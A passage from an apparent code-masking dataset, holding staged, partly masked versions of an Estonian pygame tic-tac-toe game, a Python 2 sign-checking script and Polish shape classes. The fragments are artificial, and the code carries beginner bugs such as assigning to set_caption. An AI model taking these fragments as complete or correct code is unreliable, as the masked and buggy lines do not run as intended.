tabeliveerg * 100 + 50\n Ykeskkoht = tabelirida * 100 + 50\n if Tähis == 'O':\n pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)\n else:\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),\n (Xkeskkoht + 22, Ykeskkoht + 22), 2)\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),\n (Xkeskkoht - 22, Ykeskkoht + 22), 2)\n joonestik[tabelirida][tabeliveerg] = Tähis\n\n\ndef mängu_võitja(tabel):\n global joonestik, võitja\n for rida in range(0, 3):\n if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2\n ] and joonestik[rida][0] is not None:\n võitja = joonestik[rida][0]\n pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),\n (300, (rida + 1) * 100 - 50), 2)\n break\n for veerg in range(0, 3):\n if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg\n ] and joonestik[0][veerg] is not None:\n võitja = joonestik[0][veerg]\n pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0\n ), ((veerg + 1) * 100 - 50, 300), 2)\n break\n if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0\n ] is not None:\n võitja = joonestik[0][0]\n pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)\n if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2\n ] is not None:\n võitja = joonestik[0][2]\n pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)\n\n\ndef hetkeseis(tabel):\n global XO, võitja\n if võitja is None:\n sõnum = XO + ' käib'\n else:\n sõnum = võitja + ' võitis!'\n font = pygame.font.Font(None, 24)\n tekst = font.render(sõnum, 1, (0, 0, 0))\n tabel.fill((250, 250, 250), (0, 300, 300, 25))\n tabel.blit(tekst, (10, 300))\n\n\n<mask token>\n",
"step-3": "<mask token>\npygame.init()\nttt = pygame.display.set_mode((300, 325))\npygame.display.set_caption = 'Trips-Traps-Trull'\nvõitja = None\n\n\ndef init_tabel(ttt):\n taust = pygame.Surface(ttt.get_size())\n taust = taust.convert()\n taust.fill((250, 250, 250))\n pygame.draw.line(taust, (0, 0, 0), (100, 0), (100, 300), 2)\n pygame.draw.line(taust, (0, 0, 0), (200, 0), (200, 300), 2)\n pygame.draw.line(taust, (0, 0, 0), (0, 100), (300, 100), 2)\n pygame.draw.line(taust, (0, 0, 0), (0, 200), (300, 200), 2)\n return taust\n\n\ndef näita_tabelit(ttt, tabel):\n hetkeseis(tabel)\n ttt.blit(tabel, (0, 0))\n pygame.display.flip()\n\n\ndef hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):\n if Ykoordinaat < 100:\n rida = 0\n elif Ykoordinaat < 200:\n rida = 1\n else:\n rida = 2\n if Xkoordinaat < 100:\n veerg = 0\n elif Xkoordinaat < 200:\n veerg = 1\n else:\n veerg = 2\n return rida, veerg\n\n\ndef klikk_tabelis(tabel):\n global joonestik, XO\n Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()\n rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)\n if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':\n return\n joonistamine(tabel, rida, veerg, XO)\n if XO == 'X':\n XO = 'O'\n else:\n XO = 'X'\n\n\ndef joonistamine(tabel, tabelirida, tabeliveerg, Tähis):\n Xkeskkoht = tabeliveerg * 100 + 50\n Ykeskkoht = tabelirida * 100 + 50\n if Tähis == 'O':\n pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)\n else:\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),\n (Xkeskkoht + 22, Ykeskkoht + 22), 2)\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),\n (Xkeskkoht - 22, Ykeskkoht + 22), 2)\n joonestik[tabelirida][tabeliveerg] = Tähis\n\n\ndef mängu_võitja(tabel):\n global joonestik, võitja\n for rida in range(0, 3):\n if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2\n ] and joonestik[rida][0] is not None:\n võitja = joonestik[rida][0]\n pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),\n (300, (rida + 1) * 100 - 50), 2)\n break\n for veerg in range(0, 3):\n if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg\n ] and joonestik[0][veerg] is not None:\n võitja = joonestik[0][veerg]\n pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0\n ), ((veerg + 1) * 100 - 50, 300), 2)\n break\n if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0\n ] is not None:\n võitja = joonestik[0][0]\n pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)\n if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2\n ] is not None:\n võitja = joonestik[0][2]\n pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)\n\n\ndef hetkeseis(tabel):\n global XO, võitja\n if võitja is None:\n sõnum = XO + ' käib'\n else:\n sõnum = võitja + ' võitis!'\n font = pygame.font.Font(None, 24)\n tekst = font.render(sõnum, 1, (0, 0, 0))\n tabel.fill((250, 250, 250), (0, 300, 300, 25))\n tabel.blit(tekst, (10, 300))\n\n\nXO = 'X'\njoonestik = [[None, None, None], [None, None, None], [None, None, None]]\ntabel = init_tabel(ttt)\njooksutab = 1\nwhile jooksutab == 1:\n for event in pygame.event.get():\n if event.type is QUIT:\n jooksutab = 0\n elif event.type is MOUSEBUTTONDOWN:\n klikk_tabelis(tabel)\n mängu_võitja(tabel)\n näita_tabelit(ttt, tabel)\n if võitja is not None:\n break\n",
"step-4": "import pygame\nfrom pygame.locals import *\npygame.init()\nttt = pygame.display.set_mode((300, 325))\npygame.display.set_caption = 'Trips-Traps-Trull'\nvõitja = None\n\n\ndef init_tabel(ttt):\n taust = pygame.Surface(ttt.get_size())\n taust = taust.convert()\n taust.fill((250, 250, 250))\n pygame.draw.line(taust, (0, 0, 0), (100, 0), (100, 300), 2)\n pygame.draw.line(taust, (0, 0, 0), (200, 0), (200, 300), 2)\n pygame.draw.line(taust, (0, 0, 0), (0, 100), (300, 100), 2)\n pygame.draw.line(taust, (0, 0, 0), (0, 200), (300, 200), 2)\n return taust\n\n\ndef näita_tabelit(ttt, tabel):\n hetkeseis(tabel)\n ttt.blit(tabel, (0, 0))\n pygame.display.flip()\n\n\ndef hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat):\n if Ykoordinaat < 100:\n rida = 0\n elif Ykoordinaat < 200:\n rida = 1\n else:\n rida = 2\n if Xkoordinaat < 100:\n veerg = 0\n elif Xkoordinaat < 200:\n veerg = 1\n else:\n veerg = 2\n return rida, veerg\n\n\ndef klikk_tabelis(tabel):\n global joonestik, XO\n Xkoordinaat, Ykoordinaat = pygame.mouse.get_pos()\n rida, veerg = hiire_positsioon_tabelis(Xkoordinaat, Ykoordinaat)\n if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O':\n return\n joonistamine(tabel, rida, veerg, XO)\n if XO == 'X':\n XO = 'O'\n else:\n XO = 'X'\n\n\ndef joonistamine(tabel, tabelirida, tabeliveerg, Tähis):\n Xkeskkoht = tabeliveerg * 100 + 50\n Ykeskkoht = tabelirida * 100 + 50\n if Tähis == 'O':\n pygame.draw.circle(tabel, (0, 0, 0), (Xkeskkoht, Ykeskkoht), 44, 2)\n else:\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht - 22, Ykeskkoht - 22),\n (Xkeskkoht + 22, Ykeskkoht + 22), 2)\n pygame.draw.line(tabel, (0, 0, 0), (Xkeskkoht + 22, Ykeskkoht - 22),\n (Xkeskkoht - 22, Ykeskkoht + 22), 2)\n joonestik[tabelirida][tabeliveerg] = Tähis\n\n\ndef mängu_võitja(tabel):\n global joonestik, võitja\n for rida in range(0, 3):\n if joonestik[rida][0] == joonestik[rida][1] == joonestik[rida][2\n ] and joonestik[rida][0] is not None:\n võitja = joonestik[rida][0]\n pygame.draw.line(tabel, (250, 0, 0), (0, (rida + 1) * 100 - 50),\n (300, (rida + 1) * 100 - 50), 2)\n break\n for veerg in range(0, 3):\n if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg\n ] and joonestik[0][veerg] is not None:\n võitja = joonestik[0][veerg]\n pygame.draw.line(tabel, (250, 0, 0), ((veerg + 1) * 100 - 50, 0\n ), ((veerg + 1) * 100 - 50, 300), 2)\n break\n if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0\n ] is not None:\n võitja = joonestik[0][0]\n pygame.draw.line(tabel, (250, 0, 0), (50, 50), (250, 250), 2)\n if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2\n ] is not None:\n võitja = joonestik[0][2]\n pygame.draw.line(tabel, (250, 0, 0), (250, 50), (50, 250), 2)\n\n\ndef hetkeseis(tabel):\n global XO, võitja\n if võitja is None:\n sõnum = XO + ' käib'\n else:\n sõnum = võitja + ' võitis!'\n font = pygame.font.Font(None, 24)\n tekst = font.render(sõnum, 1, (0, 0, 0))\n tabel.fill((250, 250, 250), (0, 300, 300, 25))\n tabel.blit(tekst, (10, 300))\n\n\nXO = 'X'\njoonestik = [[None, None, None], [None, None, None], [None, None, None]]\ntabel = init_tabel(ttt)\njooksutab = 1\nwhile jooksutab == 1:\n for event in pygame.event.get():\n if event.type is QUIT:\n jooksutab = 0\n elif event.type is MOUSEBUTTONDOWN:\n klikk_tabelis(tabel)\n mängu_võitja(tabel)\n näita_tabelit(ttt, tabel)\n if võitja is not None:\n break\n",
"step-5": "import pygame\n\nfrom pygame.locals import *\n\npygame.init()\nttt = pygame.display.set_mode((300,325)) #loome mänguakna\npygame.display.set_caption = (\"Trips-Traps-Trull\")\n\nvõitja = None\n\n\n\ndef init_tabel(ttt):\n taust = pygame.Surface(ttt.get_size())\n taust = taust.convert()\n taust.fill((250,250,250))\n \n #tõmbame jooned\n \n pygame.draw.line (taust, (0,0,0), (100,0), (100,300), 2) #vertikaalsed jooned\n pygame.draw.line (taust, (0,0,0), (200,0), (200,300), 2)\n\n pygame.draw.line (taust, (0,0,0), (0,100), (300,100), 2) #horisontaalsed jooned\n pygame.draw.line (taust, (0,0,0), (0,200), (300,200), 2)\n return taust\n\n\ndef näita_tabelit (ttt, tabel):\n hetkeseis(tabel)\n ttt.blit (tabel, (0,0))\n pygame.display.flip()\n\ndef hiire_positsioon_tabelis (Xkoordinaat, Ykoordinaat):\n if (Ykoordinaat < 100): #millisele reale klikib\n rida = 0\n elif (Ykoordinaat < 200):\n rida = 1\n else:\n rida = 2\n if (Xkoordinaat < 100): #millisele veerule klikib\n veerg = 0\n elif (Xkoordinaat < 200):\n veerg = 1\n else:\n veerg = 2\n return (rida, veerg)\n\ndef klikk_tabelis (tabel): #teeme kindlaks kuhu klikiti\n global joonestik, XO\n\n (Xkoordinaat, Ykoordinaat) = pygame.mouse.get_pos()\n\n (rida, veerg) = hiire_positsioon_tabelis (Xkoordinaat, Ykoordinaat)\n\n if joonestik[rida][veerg] == 'X' or joonestik[rida][veerg] == 'O': #kontrollime kas lahter on kasutusel\n return #lahter on juba kasutusel\n\n joonistamine (tabel, rida, veerg, XO) #joonista X või O\n \n if (XO == 'X'):\n XO = 'O' #käigu üleandmine teisele inimesele\n else:\n XO = 'X'\n\n\ndef joonistamine (tabel, tabelirida, tabeliveerg, Tähis):\n Xkeskkoht = tabeliveerg * 100 + 50\n #leiame keskkoha\n Ykeskkoht = tabelirida * 100 + 50\n\n if (Tähis == 'O'): #joonistame O\n pygame.draw.circle (tabel, (0,0,0), (Xkeskkoht, Ykeskkoht), 44, 2)\n\n else:\n pygame.draw.line (tabel, (0,0,0), (Xkeskkoht - 22, Ykeskkoht - 22), (Xkeskkoht + 22, Ykeskkoht + 22), 2)\n #joonistame X\n pygame.draw.line (tabel, (0,0,0), (Xkeskkoht + 22, Ykeskkoht - 22), (Xkeskkoht - 22, Ykeskkoht + 22), 2)\n\n joonestik[tabelirida][tabeliveerg] = Tähis #märgime lahtri kasutatuks\n\n\ndef mängu_võitja(tabel): #kontrollib, kas kumbki võitis\n global joonestik, võitja\n\n for rida in range (0, 3): #kontrollime ridu\n if joonestik [rida][0] == joonestik[rida][1] == joonestik[rida][2] and joonestik [rida][0] is not None:\n võitja = joonestik[rida][0] #see rida võitis\n pygame.draw.line (tabel, (250,0,0), (0, (rida + 1)*100 - 50), (300, (rida + 1)*100 - 50), 2)\n break\n\n for veerg in range (0, 3): #kontrollime veerge\n if joonestik[0][veerg] == joonestik[1][veerg] == joonestik[2][veerg] and joonestik[0][veerg] is not None:\n võitja = joonestik[0][veerg] #see veerg võitis\n pygame.draw.line (tabel, (250,0,0), ((veerg + 1)* 100 - 50, 0), ((veerg + 1)* 100 - 50, 300), 2)\n break\n\n if joonestik[0][0] == joonestik[1][1] == joonestik[2][2] and joonestik[0][0] is not None: #kontrollime diagonaale\n võitja = joonestik[0][0] #vasakult paremale diagonaal võitis\n pygame.draw.line (tabel, (250,0,0), (50, 50), (250, 250), 2)\n\n if joonestik[0][2] == joonestik[1][1] == joonestik[2][0] and joonestik[0][2] is not None:\n võitja = joonestik[0][2] #paremalt vasakule diagonaal võitis\n pygame.draw.line (tabel, (250,0,0), (250, 50), (50, 250), 2)\n\n\ndef hetkeseis (tabel): #kuva hetkeseis(kelle käik/kes võitis)\n global XO, võitja\n if võitja is None:\n sõnum = XO + \" käib\"\n else:\n sõnum = võitja + \" võitis!\"\n font = pygame.font.Font(None, 24)\n tekst = 
font.render(sõnum, 1, (0,0,0))\n#kopeerime sõnumi mänguaknas\n tabel.fill ((250, 250, 250), (0, 300, 300, 25))\n tabel.blit (tekst, (10, 300))\n\n\nXO = 'X' #X alustab\n\njoonestik = [ [ None, None, None ], #tühjad lahtrid\n\n [ None, None, None ],\n\n [ None, None, None ] ]\n\ntabel = init_tabel(ttt)\njooksutab = 1\nwhile jooksutab == 1:\n for event in pygame.event.get():\n if event.type is QUIT:\n jooksutab = 0\n elif event.type is MOUSEBUTTONDOWN:\n klikk_tabelis(tabel)\n\n mängu_võitja(tabel) #kontrollib võitjat peale igat käiku\n\n näita_tabelit(ttt,tabel) #uuendab mängulauda\n if võitja is not None:\n break\n",
"step-ids": [
6,
7,
9,
10,
11
]
}
|
[
6,
7,
9,
10,
11
] |
#!/usr/bin/python
def check(n):
    if n == 0:
        return "neither Positive nor Negative"
    if n < 0:
        return "Negative"
    if n > 0:
        return "Positive"

print("10 is", check(10))
print("-5 is", check(-5))
print("0 is", check(0))
|
normal
|
{
"blob_id": "9c6bb885c05ee13a283b09861a5aa7c5e62677cb",
"index": 1008,
"step-1": "#!/usr/bin/python\ndef check(n):\n if n == 0 :\n print \"neither Positive nor Negative\"\n if n < 0 :\n print \"Negative\"\n if n > 0 :\n print \"Positive\"\n\n\n\nprint \"10 is \", check(10)\nprint \"-5 is \", check(-5)\nprint \"0 is \", check(0)",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class Punkt(Figura):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Linia(Figura):
def __init__(self):
print('Tworze obiekt klasy Linia...')
def wyswietl(self):
print('Metoda wyswietl klasy Linia.')
def wypelnij(self):
print('Metoda wypelnij klasy Linia.')
def usun(self):
print('Metoda usun klasy Linia.')
class Kwadrat(Figura):
def __init__(self):
print('Tworze obiekt klasy Kwadrat...')
def wyswietl(self):
print('Metoda wyswietl klasy Kwadrat.')
def wypelnij(self):
print('Metoda wypelnij klasy Kwadrat.')
def usun(self):
print('Metoda usun klasy Kwadrat.')
class XXOkrag:
def __init__(self):
print('Tworze obiekt klasy XXOkrag...')
def wyswietlaj(self):
print('Metoda wyswietlaj klasy XXOkrag.')
def wypelniaj(self):
print('Metoda wypelniaj klasy XXOkrag.')
def usuwaj(self):
print('Metoda usuwaj klasy XXOkrag.')
def pobierz_polozenie(self):
print('Metoda pobierz_polozenie klasy XXOkrag.')
def nadaj_polozenie(self):
print('Metoda nadaj_polozenie klasy XXOkrag.')
def ustaw_kolor(self):
print('Metoda ustaw_kolor klasy XXOkrag.')
class Okrag(Figura):
def __init__(self):
self.xokrag = XXOkrag()
def pobierz_polozenie(self):
self.xokrag.pobierz_polozenie()
def nadaj_polozenie(self):
self.xokrag.nadaj_polozenie()
def wyswietl(self):
self.xokrag.wyswietlaj()
def wypelnij(self):
self.xokrag.wypelniaj()
def nadaj_kolor(self):
self.xokrag.ustaw_kolor()
def usun(self):
self.xokrag.usuwaj()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Punkt(Figura):
def __init__(self):
print('Tworze obiekt klasy Punkt...')
def wyswietl(self):
print('Metoda wyswietl klasy Punkt.')
<|reserved_special_token_0|>
def usun(self):
print('Metoda usun klasy Punkt.')
class Linia(Figura):
def __init__(self):
print('Tworze obiekt klasy Linia...')
def wyswietl(self):
print('Metoda wyswietl klasy Linia.')
def wypelnij(self):
print('Metoda wypelnij klasy Linia.')
def usun(self):
print('Metoda usun klasy Linia.')
class Kwadrat(Figura):
def __init__(self):
print('Tworze obiekt klasy Kwadrat...')
def wyswietl(self):
print('Metoda wyswietl klasy Kwadrat.')
def wypelnij(self):
print('Metoda wypelnij klasy Kwadrat.')
def usun(self):
print('Metoda usun klasy Kwadrat.')
class XXOkrag:
def __init__(self):
print('Tworze obiekt klasy XXOkrag...')
def wyswietlaj(self):
print('Metoda wyswietlaj klasy XXOkrag.')
def wypelniaj(self):
print('Metoda wypelniaj klasy XXOkrag.')
def usuwaj(self):
print('Metoda usuwaj klasy XXOkrag.')
def pobierz_polozenie(self):
print('Metoda pobierz_polozenie klasy XXOkrag.')
def nadaj_polozenie(self):
print('Metoda nadaj_polozenie klasy XXOkrag.')
def ustaw_kolor(self):
print('Metoda ustaw_kolor klasy XXOkrag.')
class Okrag(Figura):
def __init__(self):
self.xokrag = XXOkrag()
def pobierz_polozenie(self):
self.xokrag.pobierz_polozenie()
def nadaj_polozenie(self):
self.xokrag.nadaj_polozenie()
def wyswietl(self):
self.xokrag.wyswietlaj()
def wypelnij(self):
self.xokrag.wypelniaj()
def nadaj_kolor(self):
self.xokrag.ustaw_kolor()
def usun(self):
self.xokrag.usuwaj()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Punkt(Figura):
def __init__(self):
print('Tworze obiekt klasy Punkt...')
def wyswietl(self):
print('Metoda wyswietl klasy Punkt.')
def wypelnij(self):
print('Metoda wypelnij klasy Punkt.')
def usun(self):
print('Metoda usun klasy Punkt.')
class Linia(Figura):
def __init__(self):
print('Tworze obiekt klasy Linia...')
def wyswietl(self):
print('Metoda wyswietl klasy Linia.')
def wypelnij(self):
print('Metoda wypelnij klasy Linia.')
def usun(self):
print('Metoda usun klasy Linia.')
class Kwadrat(Figura):
def __init__(self):
print('Tworze obiekt klasy Kwadrat...')
def wyswietl(self):
print('Metoda wyswietl klasy Kwadrat.')
def wypelnij(self):
print('Metoda wypelnij klasy Kwadrat.')
def usun(self):
print('Metoda usun klasy Kwadrat.')
class XXOkrag:
def __init__(self):
print('Tworze obiekt klasy XXOkrag...')
def wyswietlaj(self):
print('Metoda wyswietlaj klasy XXOkrag.')
def wypelniaj(self):
print('Metoda wypelniaj klasy XXOkrag.')
def usuwaj(self):
print('Metoda usuwaj klasy XXOkrag.')
def pobierz_polozenie(self):
print('Metoda pobierz_polozenie klasy XXOkrag.')
def nadaj_polozenie(self):
print('Metoda nadaj_polozenie klasy XXOkrag.')
def ustaw_kolor(self):
print('Metoda ustaw_kolor klasy XXOkrag.')
class Okrag(Figura):
def __init__(self):
self.xokrag = XXOkrag()
def pobierz_polozenie(self):
self.xokrag.pobierz_polozenie()
def nadaj_polozenie(self):
self.xokrag.nadaj_polozenie()
def wyswietl(self):
self.xokrag.wyswietlaj()
def wypelnij(self):
self.xokrag.wypelniaj()
def nadaj_kolor(self):
self.xokrag.ustaw_kolor()
def usun(self):
self.xokrag.usuwaj()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Figura:
<|reserved_special_token_0|>
def pobierz_polozenie(self):
print('Metoda pobierz_polozenie klasy Figura.')
<|reserved_special_token_0|>
def wyswietl(self):
print('Metoda wyswietl klasy Figura.')
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Punkt(Figura):
def __init__(self):
print('Tworze obiekt klasy Punkt...')
def wyswietl(self):
print('Metoda wyswietl klasy Punkt.')
def wypelnij(self):
print('Metoda wypelnij klasy Punkt.')
def usun(self):
print('Metoda usun klasy Punkt.')
class Linia(Figura):
def __init__(self):
print('Tworze obiekt klasy Linia...')
def wyswietl(self):
print('Metoda wyswietl klasy Linia.')
def wypelnij(self):
print('Metoda wypelnij klasy Linia.')
def usun(self):
print('Metoda usun klasy Linia.')
class Kwadrat(Figura):
def __init__(self):
print('Tworze obiekt klasy Kwadrat...')
def wyswietl(self):
print('Metoda wyswietl klasy Kwadrat.')
def wypelnij(self):
print('Metoda wypelnij klasy Kwadrat.')
def usun(self):
print('Metoda usun klasy Kwadrat.')
class XXOkrag:
def __init__(self):
print('Tworze obiekt klasy XXOkrag...')
def wyswietlaj(self):
print('Metoda wyswietlaj klasy XXOkrag.')
def wypelniaj(self):
print('Metoda wypelniaj klasy XXOkrag.')
def usuwaj(self):
print('Metoda usuwaj klasy XXOkrag.')
def pobierz_polozenie(self):
print('Metoda pobierz_polozenie klasy XXOkrag.')
def nadaj_polozenie(self):
print('Metoda nadaj_polozenie klasy XXOkrag.')
def ustaw_kolor(self):
print('Metoda ustaw_kolor klasy XXOkrag.')
class Okrag(Figura):
def __init__(self):
self.xokrag = XXOkrag()
def pobierz_polozenie(self):
self.xokrag.pobierz_polozenie()
def nadaj_polozenie(self):
self.xokrag.nadaj_polozenie()
def wyswietl(self):
self.xokrag.wyswietlaj()
def wypelnij(self):
self.xokrag.wypelniaj()
def nadaj_kolor(self):
self.xokrag.ustaw_kolor()
def usun(self):
self.xokrag.usuwaj()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Figura:
def __init__(self):
print("Tworze obiekt klasy Figura...")
def pobierz_polozenie(self):
print("Metoda pobierz_polozenie klasy Figura.")
def nadaj_polozenie(self):
print("Metoda nadaj_polozenie klasy Figura.")
def wyswietl(self):
print("Metoda wyswietl klasy Figura.")
def wypelnij(self):
print("Metoda wypelnij klasy Figura.")
def nadaj_kolor(self):
print("Metoda nadaj_kolor klasy Figura.")
def usun(self):
print("Metoda usun klasy Figura.")
class Punkt(Figura):
def __init__(self):
print("Tworze obiekt klasy Punkt...")
def wyswietl(self):
print("Metoda wyswietl klasy Punkt.")
def wypelnij(self):
print("Metoda wypelnij klasy Punkt.")
def usun(self):
print("Metoda usun klasy Punkt.")
class Linia(Figura):
def __init__(self):
print("Tworze obiekt klasy Linia...")
def wyswietl(self):
print("Metoda wyswietl klasy Linia.")
def wypelnij(self):
print("Metoda wypelnij klasy Linia.")
def usun(self):
print("Metoda usun klasy Linia.")
class Kwadrat(Figura):
def __init__(self):
print("Tworze obiekt klasy Kwadrat...")
def wyswietl(self):
print("Metoda wyswietl klasy Kwadrat.")
def wypelnij(self):
print("Metoda wypelnij klasy Kwadrat.")
def usun(self):
print("Metoda usun klasy Kwadrat.")
class XXOkrag:
def __init__(self):
print("Tworze obiekt klasy XXOkrag...")
def wyswietlaj(self):
print("Metoda wyswietlaj klasy XXOkrag.")
def wypelniaj(self):
print("Metoda wypelniaj klasy XXOkrag.")
def usuwaj(self):
print("Metoda usuwaj klasy XXOkrag.")
def pobierz_polozenie(self):
print("Metoda pobierz_polozenie klasy XXOkrag.")
def nadaj_polozenie(self):
print("Metoda nadaj_polozenie klasy XXOkrag.")
def ustaw_kolor(self):
print("Metoda ustaw_kolor klasy XXOkrag.")
class Okrag(Figura):
def __init__(self):
self.xokrag = XXOkrag()
def pobierz_polozenie(self):
self.xokrag.pobierz_polozenie()
def nadaj_polozenie(self):
self.xokrag.nadaj_polozenie()
def wyswietl(self):
self.xokrag.wyswietlaj()
def wypelnij(self):
self.xokrag.wypelniaj()
def nadaj_kolor(self):
self.xokrag.ustaw_kolor()
def usun(self):
self.xokrag.usuwaj()
if __name__ == "__main__":
lista_figur = [Linia(), Kwadrat(), Okrag()]
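    # polymorphic dispatch: each object resolves wyswietl() to its own class;
    # Okrag forwards the call to the XXOkrag instance it wraps.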
for fig in lista_figur:
fig.wyswietl()
|
flexible
|
{
"blob_id": "774bf2b49f6e546f16294edc17e9ac34fa8a9ba8",
"index": 2711,
"step-1": "<mask token>\n\n\nclass Punkt(Figura):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n self.xokrag.usuwaj()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Punkt(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Punkt...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Punkt.')\n <mask token>\n\n def usun(self):\n print('Metoda usun klasy Punkt.')\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze obiekt klasy XXOkrag...')\n\n def wyswietlaj(self):\n print('Metoda wyswietlaj klasy XXOkrag.')\n\n def wypelniaj(self):\n print('Metoda wypelniaj klasy XXOkrag.')\n\n def usuwaj(self):\n print('Metoda usuwaj klasy XXOkrag.')\n\n def pobierz_polozenie(self):\n print('Metoda pobierz_polozenie klasy XXOkrag.')\n\n def nadaj_polozenie(self):\n print('Metoda nadaj_polozenie klasy XXOkrag.')\n\n def ustaw_kolor(self):\n print('Metoda ustaw_kolor klasy XXOkrag.')\n\n\nclass Okrag(Figura):\n\n def __init__(self):\n self.xokrag = XXOkrag()\n\n def pobierz_polozenie(self):\n self.xokrag.pobierz_polozenie()\n\n def nadaj_polozenie(self):\n self.xokrag.nadaj_polozenie()\n\n def wyswietl(self):\n self.xokrag.wyswietlaj()\n\n def wypelnij(self):\n self.xokrag.wypelniaj()\n\n def nadaj_kolor(self):\n self.xokrag.ustaw_kolor()\n\n def usun(self):\n self.xokrag.usuwaj()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Punkt(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Punkt...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Punkt.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Punkt.')\n\n def usun(self):\n print('Metoda usun klasy Punkt.')\n\n\nclass Linia(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Linia...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Linia.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Linia.')\n\n def usun(self):\n print('Metoda usun klasy Linia.')\n\n\nclass Kwadrat(Figura):\n\n def __init__(self):\n print('Tworze obiekt klasy Kwadrat...')\n\n def wyswietl(self):\n print('Metoda wyswietl klasy Kwadrat.')\n\n def wypelnij(self):\n print('Metoda wypelnij klasy Kwadrat.')\n\n def usun(self):\n print('Metoda usun klasy Kwadrat.')\n\n\nclass XXOkrag:\n\n def __init__(self):\n print('Tworze 